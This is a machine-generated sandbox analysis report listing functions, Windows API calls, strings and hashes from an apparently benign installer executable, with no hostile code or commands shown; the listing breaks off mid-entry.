GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 006EED92
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 006EEDA4
GetExitCodeProcess.KERNEL32(?,?), ref: 006EEDC1
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 006EEDCB
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 006EEDD8
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,00000044,?), ref: 006EEDE2

Strings

&_', xrefs: 006EEC86
"%s" %s, xrefs: 006EED10

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeCreateExitHandleHeapObjectSingleWait
String ID: "%s" %s$&_'
API String ID: 3234789809-2124839409
Opcode ID: 914ddc46212691d91cd522acbd834a59f44064183b69dc112f949cd024b3f5cc
Instruction ID: 67c2b01efd92664e38a59f3692669a1ff7b43f85e01b4dfc71032d1455f66ee1
Opcode Fuzzy Hash: 914ddc46212691d91cd522acbd834a59f44064183b69dc112f949cd024b3f5cc
Instruction Fuzzy Hash: 9A519B71E05655DFCB14CFA5CC09BAEB7B6FF48710F20462AE821A7390EB71A941CB90

Function 00872390 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 158libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDefaultLangID.KERNEL32 ref: 008723C7
GetUserDefaultLangID.KERNEL32 ref: 008723D4
LoadLibraryW.KERNEL32(kernel32.dll), ref: 008723E6
GetProcAddress.KERNEL32(00000000,GetSystemDefaultUILanguage), ref: 008723F4
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00872417

Strings

GetSystemDefaultUILanguage, xrefs: 008723EE
GetUserDefaultUILanguage, xrefs: 00872411
&_', xrefs: 00872393
kernel32.dll, xrefs: 008723DD

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: AddressDefaultLangProc$LibraryLoadSystemUser
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$&_'
API String ID: 667524283-3396233895
Opcode ID: acd6fdc04d06d194b24da4bead69c2b579758cb9cdeb8bc64a74df964d2bd0b8
Instruction ID: b39b9773419ee475d21ce2d0319c2563dee54031f5f53009d1b167fdfa8418e2
Opcode Fuzzy Hash: acd6fdc04d06d194b24da4bead69c2b579758cb9cdeb8bc64a74df964d2bd0b8
Instruction Fuzzy Hash: 7B51B071A083218BC748EF25A86467EB7E2FFD4705F81492EF88AC7290DB30D845DB85

Function 006F85F0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 115COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00A6D6DC,275F26E1,00000000,?,?,?,?,?,?,006F7D55,0093FE5D,000000FF), ref: 006F862D
LoadCursorW.USER32(00000000,00007F00), ref: 006F86A8
LoadCursorW.USER32(00000000,00007F00), ref: 006F8750
LeaveCriticalSection.KERNEL32(00A6D6DC), ref: 006F87A3

Strings

AtlAxWinLic140, xrefs: 006F870D, 006F8767
WM_ATLGETCONTROL, xrefs: 006F8642
WM_ATLGETHOST, xrefs: 006F8633
&_', xrefs: 006F8605
AtlAxWin140, xrefs: 006F865B, 006F86C3

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CriticalCursorLoadSection$EnterLeave
String ID: AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST$&_'
API String ID: 3727441302-3179582490
Opcode ID: 7f31f5edd445c086771f8a90d86f9e13286a978fc21298babf6bd65cf25e2a83
Instruction ID: ed5139747707385360d8143ace180e31ecc210281c7d8be116431263ed4c8f49
Opcode Fuzzy Hash: 7f31f5edd445c086771f8a90d86f9e13286a978fc21298babf6bd65cf25e2a83
Instruction Fuzzy Hash: B45112B5D15218AFCB10DFE8DC49BDEBBB8FF08748F10415AE504A7390DBB54A468BA4

Function 0544884A Relevance: 15.1, Strings: 12, Instructions: 92COMMON

Download Yara Rule

Strings

USERDOMAIN_ROAMINGPROFILE=ALFONS-PC, xrefs: 054488D7
ComSpec=C:\Windows\system32\cmd.exe, xrefs: 0544885F
ProgramData=C:\ProgramData, xrefs: 054488A7
APPDATA=C:\Users\user\AppData\Roaming, xrefs: 0544884B
ProgramW6432=C:\Program Files, xrefs: 054488B3
TMP=C:\Users\user\AppData\Local\Temp, xrefs: 054488CF
ProgramFiles=C:\Program Files (x86), xrefs: 054488AB
OneDrive=C:\Users\user\OneDrive, xrefs: 05448883
TEMP=C:\Users\user\AppData\Local\Temp, xrefs: 054488CB
USERPROFILE=C:\Users\user, xrefs: 054488DF
PROCESSOR_ARCHITECTURE=x86, xrefs: 05448893
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel, xrefs: 0544889B

Memory Dump Source

Source File: 00000000.00000003.2178759112.0000000005440000.00000004.00000020.00020000.00000000.sdmp, Offset: 0543B000, based on PE: false

Associated: 00000000.00000003.2147062589.000000000542A000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_542a000_Setup.jbxd

Similarity

API ID:
String ID: APPDATA=C:\Users\user\AppData\Roaming$ComSpec=C:\Windows\system32\cmd.exe$OneDrive=C:\Users\user\OneDrive$PROCESSOR_ARCHITECTURE=x86$PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntel$ProgramData=C:\ProgramData$ProgramFiles=C:\Program Files (x86)$ProgramW6432=C:\Program Files$TEMP=C:\Users\user\AppData\Local\Temp$TMP=C:\Users\user\AppData\Local\Temp$USERDOMAIN_ROAMINGPROFILE=user-PC$USERPROFILE=C:\Users\user
API String ID: 0-2760420289
Opcode ID: 93a67a556e2bd3c480266b13e2fe5314caa61659cabe292a63206ff0acd94485
Instruction ID: f748e2af6ffe04a50bb7c03cf38658369123dac5a258adb626bfdb04f16c7933
Opcode Fuzzy Hash: 93a67a556e2bd3c480266b13e2fe5314caa61659cabe292a63206ff0acd94485
Instruction Fuzzy Hash: F221036B8D85869BF7254A65CCCB3C83BB4EA12114BEC4C4BD8C6D6302E34AC1878B56

Function 00848530 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 423fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,275F26E1,00000000,?), ref: 0084869B
ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,00001000), ref: 0084870D
ReadFile.KERNEL32(?,00000000,00001000,00000000,00000000,?,?,00000000), ref: 008489B9
CloseHandle.KERNEL32(?), ref: 00848A17

Part of subcall function 00848530: LoadStringW.USER32(000000A1,?,00000514,275F26E1), ref: 00848488

Strings

&_', xrefs: 0084844F, 00848547, 00848638

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$Read$CloseCreateHandleHeapLoadProcessString
String ID: &_'
API String ID: 2846944389-2411122644
Opcode ID: 4c96155b1f281e61cfe44257154cd6a56be4c2dfb2c88b23d577c2c950cfbd06
Instruction ID: a420e4e9f16db0bcca53ecf371550f51ac842f00bf864e30a436a057d996ce59
Opcode Fuzzy Hash: 4c96155b1f281e61cfe44257154cd6a56be4c2dfb2c88b23d577c2c950cfbd06
Instruction Fuzzy Hash: 80F18C71E0431CDBDB20CFA8C949BAEBBB5FF45314F244259E815EB281DB74AA44CB91

Function 0088ECF0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 373fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088EE1F
CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0088EE71
ReadFile.KERNEL32(00000000,?,000003FF,?,00000000), ref: 0088EEB3
ReadFile.KERNEL32(00000000,00000000,000003FF,00000000,00000000,00000000), ref: 0088EEFE
CloseHandle.KERNEL32(00000000), ref: 0088EF8E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0088F116

Strings

--verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 0088EDAF
&_', xrefs: 0088ED07

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: File$DeleteRead$CloseCreateHandleHeapProcess
String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"$&_'
API String ID: 70679524-3718897728
Opcode ID: 4414b0e76f51729616e78e9ec8b3ef08c166abada24cb5ca0305484fd89424aa
Instruction ID: 451d90e5e1319bbdd2552176dd1a942305f94349f6bc0e6d484429d8fde4caea
Opcode Fuzzy Hash: 4414b0e76f51729616e78e9ec8b3ef08c166abada24cb5ca0305484fd89424aa
Instruction Fuzzy Hash: 6FE18D70A002189BDB11DB68CC84B9DB7B5FF49324F1441E8EA15E7392DB70AE85CF95

Function 0084D1C0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 213COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,275F26E1,?), ref: 0084D257
SymSetSearchPath.IMAGEHLP(&_',?,275F26E1,?), ref: 0084D4B8

Strings

%hs:%ld, xrefs: 0084D754
&_', xrefs: 0084D4B0, 0084D4B6
%hs(), xrefs: 0084D98A
[0x%.8Ix] , xrefs: 0084D8A7
-> , xrefs: 0084DA9C
&_', xrefs: 0084D1D7, 0084D83B

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: FileModuleNamePathSearch
String ID: -> $%hs()$%hs:%ld$[0x%.8Ix] $&_'$&_'
API String ID: 1980563475-3539457033
Opcode ID: 351426ebd19ea1fb74f5bf5b48c82010ac80526ddc5d829163cdccd4ae8850f8
Instruction ID: 6d984c31c5aad919c2c3ef09e7e7a441e70aa925fc6f0bbfcd3e2b4f9bd98446
Opcode Fuzzy Hash: 351426ebd19ea1fb74f5bf5b48c82010ac80526ddc5d829163cdccd4ae8850f8
Instruction Fuzzy Hash: FC916871D0066C8BCB29CF28CC55BEDB7B5FB4A314F1082D9E559A7291EB709A848F81

Function 00846490 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121processsynchronizationCOMMON

Download Yara Rule

APIs

Wow64DisableWow64FsRedirection.KERNEL32(00000000,275F26E1,00000000,?), ref: 008464F9
CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00846571
GetLastError.KERNEL32 ref: 00846582
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0084659E
GetExitCodeProcess.KERNEL32(?,000000FF), ref: 008465AF
CloseHandle.KERNEL32(?), ref: 008465B9
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 008465D4

Strings

&_', xrefs: 008464BA

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Wow64$ProcessRedirection$CloseCodeCreateDisableErrorExitHandleLastObjectRevertSingleWait
String ID: &_'
API String ID: 1153077990-2411122644
Opcode ID: 114345968df59fcc0fee0adf5c5289a889b997ebd67df75a3dafecb60f436113
Instruction ID: 352a204ebb087bf23b991e804bf5b016bb0305910ad0dd3da118681b61360aa3
Opcode Fuzzy Hash: 114345968df59fcc0fee0adf5c5289a889b997ebd67df75a3dafecb60f436113
Instruction Fuzzy Hash: 59418F71E083499BDB10CFA9CC457AEBBF4FF5A310F148269E820E7294E6749954CFA1

Function 00860150 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 346comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00860228
CoCreateInstance.COMBASE(009D30C0,00000000,00000017,009FAD20,?), ref: 0086025B
CoUninitialize.COMBASE ref: 008602FC

Part of subcall function 00872E80: CreateThread.KERNEL32(00000000,00000000,00890360,009F2FF4,00000000,?), ref: 00872EFD
Part of subcall function 00872E80: GetLastError.KERNEL32 ref: 00872F0A
Part of subcall function 00872E80: WaitForSingleObject.KERNEL32(00000000,FFFFFFFF), ref: 00872F33
Part of subcall function 00872E80: GetExitCodeThread.KERNEL32(00000000,?), ref: 00872F4D
Part of subcall function 00872E80: TerminateThread.KERNEL32(00000000,00000000), ref: 00872F65
Part of subcall function 00872E80: CloseHandle.KERNEL32(00000000), ref: 00872F6E

GetTickCount.KERNEL32 ref: 00860450
__Xtime_get_ticks.LIBCPMT ref: 00860458
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008604B1

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Strings

&_', xrefs: 00860167, 008603C7

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Thread$Create$CloseCodeCountErrorExitHandleHeapInitializeInstanceLastObjectProcessSingleTerminateTickUninitializeUnothrow_t@std@@@WaitXtime_get_ticks__ehfuncinfo$??2@
String ID: &_'
API String ID: 560257006-2411122644
Opcode ID: 33e8456bdd0af097e3da66009c8b380a1338861217ca1d9099400a50a5b9f228
Instruction ID: 16d470dcc4ed63bc1acaaa7830b54f52ea08787be7d621685f44aaa54b4abca4
Opcode Fuzzy Hash: 33e8456bdd0af097e3da66009c8b380a1338861217ca1d9099400a50a5b9f228
Instruction Fuzzy Hash: 70D1BC71A042099FDF04DFA8C849BAEBBB4FF48324F154169E915E7381DB74AA01CF95

Function 0072B110 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 0072B219
std::_Throw_Cpp_error.LIBCPMT ref: 0072B224

Part of subcall function 0090EB9E: ReleaseSRWLockExclusive.KERNEL32(?,?,0090E728,00A63000,275F26E1,?,?,?,?,00000000,009A5004,000000FF,?,006EF9E0,?,00000001), ref: 0090EBB2

Strings

&_', xrefs: 0072B127, 0072B246, 0072B435

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ExclusiveLockRelease
String ID: &_'
API String ID: 3666349979-2411122644
Opcode ID: 56e06f4143c96a38a86b4bd6f96eb6443814e1807ec68048d7d180b40a67d15c
Instruction ID: d401f585042e96d217b93edf93ce4d12367d838c967f2c0a660f6c568f74f662
Opcode Fuzzy Hash: 56e06f4143c96a38a86b4bd6f96eb6443814e1807ec68048d7d180b40a67d15c
Instruction Fuzzy Hash: D1C1D2B1E00218DFDB00DF98D845BAEBBF5FF84314F14465AE815AB381D7B5AA05CB91

Function 00700AE0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 289registryCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,275F26E1), ref: 00700B81
GetLastError.KERNEL32 ref: 00700BB8
RegCloseKey.ADVAPI32(?,009D3180,00000000,009D3180,00000000,?,80000001,00000001,00000000,AppEvents\Schemes\Apps\Explorer\Navigating\.Current,00000033), ref: 00700E2E
CloseHandle.KERNEL32(?,275F26E1,?,?,00000000,0094130D,000000FF,?,009D3180,00000000,009D3180,00000000,?,80000001,00000001,00000000), ref: 00700EBE

Strings

Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 00700B76
AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 00700BF0
&_', xrefs: 00700B0B, 00700E93

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Close$CreateErrorEventHandleLast
String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover$&_'
API String ID: 1253123496-575786273
Opcode ID: 0bca07adcd00b1392b98fe2ec6637052d34ce1832b5637b29be662d59bc7d529
Instruction ID: 70ceadb8cb8964667cba0b95466cbfd38e7fe382ddaee9596ee4d9b941b68a9f
Opcode Fuzzy Hash: 0bca07adcd00b1392b98fe2ec6637052d34ce1832b5637b29be662d59bc7d529
Instruction Fuzzy Hash: E7C1CE70E00249EFDB14CFA8CC45BAEBBF5EF55304F10825DE459A7681EB786A84CB91

Function 009109B8 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,?), ref: 00910A01
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00910A6C
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00910A89
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00910AC8
LCMapStringEx.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00910B27
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00910B4A

Strings

&_', xrefs: 009109BE

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID: &_'
API String ID: 2829165498-2411122644
Opcode ID: e742b5fd18f51f8782034b1efb014c4d0481fc5a6dea68df5a65ecb2dbf6d597
Instruction ID: 6409a2a9ef5ba119cde17054838e3afc7455966763b354cc9d59449a1f09e69e
Opcode Fuzzy Hash: e742b5fd18f51f8782034b1efb014c4d0481fc5a6dea68df5a65ecb2dbf6d597
Instruction Fuzzy Hash: AB51AA72B0821EABEF209FA0CC45FEB7BA9EF84744F104425B915A6190D7B6CDD0DB90

Function 00820750 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 170windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001036,00010000,00000000), ref: 008207C8
GetParent.USER32(00000000), ref: 00820834
GetWindowRect.USER32(00000000), ref: 0082083B
GetParent.USER32(00000000), ref: 0082084A

Part of subcall function 007D4C60: GetWindowRect.USER32(?,?), ref: 007D4CF2
Part of subcall function 007D4C60: GetWindowRect.USER32(?,?), ref: 007D4D0A

SendMessageW.USER32(?,00001026,00000000,000000FF), ref: 00820946
SendMessageW.USER32(?,0000108A,00000000,00000011), ref: 0082095D

Strings

&_', xrefs: 00820778

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: MessageRectSendWindow$Parent
String ID: &_'
API String ID: 425339167-2411122644
Opcode ID: 0bc2cf19b5e195cc808bca5c5c561e5669e3609316f81558978df4f90d537db3
Instruction ID: fe5c6d1b60b27a22d780cccd3c792ca916f59ef47a521db9b64b466b6ecb9d67
Opcode Fuzzy Hash: 0bc2cf19b5e195cc808bca5c5c561e5669e3609316f81558978df4f90d537db3
Instruction Fuzzy Hash: FB615775D00218ABDB10DFA8DD49BEDBBF8FF49310F14821AE815B7290DB746982CB90

Function 006FC080 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 159threadCOMMON

Download Yara Rule

APIs

